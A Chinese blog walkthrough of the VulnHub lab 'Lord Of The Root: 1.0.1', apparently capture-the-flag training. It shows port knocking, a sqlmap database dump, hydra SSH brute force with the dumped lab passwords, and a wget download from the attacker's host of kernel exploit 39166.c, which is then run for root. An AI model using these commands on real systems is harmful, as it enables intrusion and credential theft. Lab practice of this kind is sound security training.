当前位置: 首页 > backend >正文

Lord Of The Root: 1.0.1通关

Lord Of The Root: 1.0.1

来自 <Lord Of The Root: 1.0.1 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.247

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.247

发现只有22端口开放了ssh服务,那就只能访问看看

1. 确认端口敲击需求

  • 目标服务器可能隐藏了其他服务的端口,需通过预定义的端口序列敲门才能临时开放。
  • 常见序列示例:7000,8000,9000(TCP/UDP)或动态组合(需信息收集)。

2. knock自动化工具测试端口敲击
sudo apt install knockd
knock -v 192.168.23.247 1 2 3

nmap -sV -T4 -p- -A 192.168.23.247

这次就能够成功扫描出来端口号

4,然后再访问1337端口的http服务

扫描网站存在的子目录

dirsearch -u http://192.168.23.247:1337 -x 403,404,301

http://192.168.23.247:1337/404.html

查看源代码复现一个base64编码的字符串

经过两次base64解码得到一个文件路径

访问之后发现是一个登录页面

http://192.168.23.247:1337/978345210/index.php

5,对网页进行信息收集和漏洞验证

没有明显的特征,因为是一个登录框,尝试结合burpsuite手工注入验证有无sql注入

(需要使用powershell脚本在window上面敲击一下1,2,3端口,否则无法正常访问1337端口的web服务)

# 保存为 Knock-Ports.ps1,右键以管理员身份运行

$target = "192.168.23.247"

$ports = @(1, 2, 3)  # 修改为猜测的端口序列

foreach ($port in $ports) {

  try {

    $socket = New-Object System.Net.Sockets.TcpClient

    $socket.ConnectAsync($target, $port).Wait(100)  # 100ms超时

    Write-Host "[+] SYN sent to port $port"

  } catch {

    Write-Host "[!] Failed to send SYN to port $port"

  } finally {

    $socket.Close()

  }

}

敲击之后访问成功

抓一个POST请求包

还是直接偷懒使用sqlmap扫描一下

sqlmap -o -u 'http://192.168.23.247:1337/978345210/index.php' --forms --batch

sqlmap -o -u 'http://192.168.23.247:1337/978345210/index.php' --forms --batch --dbs

sqlmap -o -u 'http://192.168.23.247:1337/978345210/index.php' --forms --batch -D Webapp --tables

sqlmap -o -u 'http://192.168.23.247:1337/978345210/index.php' --forms --batch -D Webapp -T Users --columns

sqlmap -o -u 'http://192.168.23.247:1337/978345210/index.php' --forms -D Webapp -T Users  --dump --bacth

成功得到一堆账户密码

iwilltakethering/frodo  

MyPreciousR00t/smeagol

AndMySword/aragorn

AndMyBow/legolas

AndMyAxe/gimli

6,将这些账户密码写入字典进行ssh爆破

hydra -L username.txt -P password.txt 192.168.23.247 ssh

ssh登录成功 smeagol/MyPreciousR00t

ssh smeagol@192.168.23.247

7,信息收集一下

sudo -l

find / -perm -4000 -type f 2>/dev/null

/SECRET/door1/file

/SECRET/door2/file

/SECRET/door3/file

  • 这些文件非常规系统文件,可能是靶场故意设置的提权点。
  • 检查文件属性和类型:
    ls -l /SECRET/door*/file
    file /SECRET/door*/file

8,还是尝试使用内核提权exp脚本

searchsploit ubuntu 14.04 

使用39166.c进行提权

searchsploit -m 39166.c

然后在kali上面开启一个http服务,控制靶机下载这个攻击脚本

python -m http.server

wget http://192.168.23.182:8000/39166.c

gcc进行编译给文件777权限

gcc 39166.c -o 39166

chmod 777 39166

./39166

提权成功成为root用户,得到flag

http://www.xdnf.cn/news/6261.html

相关文章:

  • 安卓system/文件夹下的哪些文件夹可以修改为别的设备的
  • 【信息系统项目管理师】第5章:信息系统工程 - 36个经典题目及详解
  • Agent Builder API - Agent Smith 扩展的后端服务(开源代码)
  • 【Java学习笔记】toString方法
  • MySQL 数据库基础
  • 右值引用的学习
  • cGAS-STING通路
  • 线程同步机制
  • GO 小游戏在线试水
  • UE中:puerts使用指南(持续更新)
  • 服务器时间发生跳变导致hghac中对应主机状态频繁切换为crash或stop
  • 从Transformer到多模态智能,剖析人工智能时代的核心引擎​​
  • Linux服务之lvs集群与dr模式部署
  • Xsens发布专为生物力学打造的全新人体模型
  • centos6.10在Macbook m芯片上使用
  • Android 设置系统默认通话应用,打不开通话界面
  • VSCode python配置
  • 数据结构第七章(二)-树形查找:二叉排序树与平衡二叉树
  • Virtualized Table 虚拟化表格 el-table-v2 表头分组 多级表头的简单示例
  • 编程的本质, 就是创造工具
  • 【网工第6版】第10章 网络规划和设计②
  • Linux 中 open 函数的本质与细节全解析
  • 【爬虫】DrissionPage-2
  • 《低代码AI革命:技术平权的曙光还是数字封建的陷阱?》
  • 鸿蒙OSUniApp 制作动态加载的瀑布流布局#三方框架 #Uniapp
  • 2025 年主流 Java 框架解析与实践:构建高性能 Web 应用
  • Go语言八股之Mysql基础详解
  • 刷题记录(4)数组元素相关操作
  • 【网络实验】-BGP-EBGP的基本配置
  • 【CTFShow】Web入门-信息搜集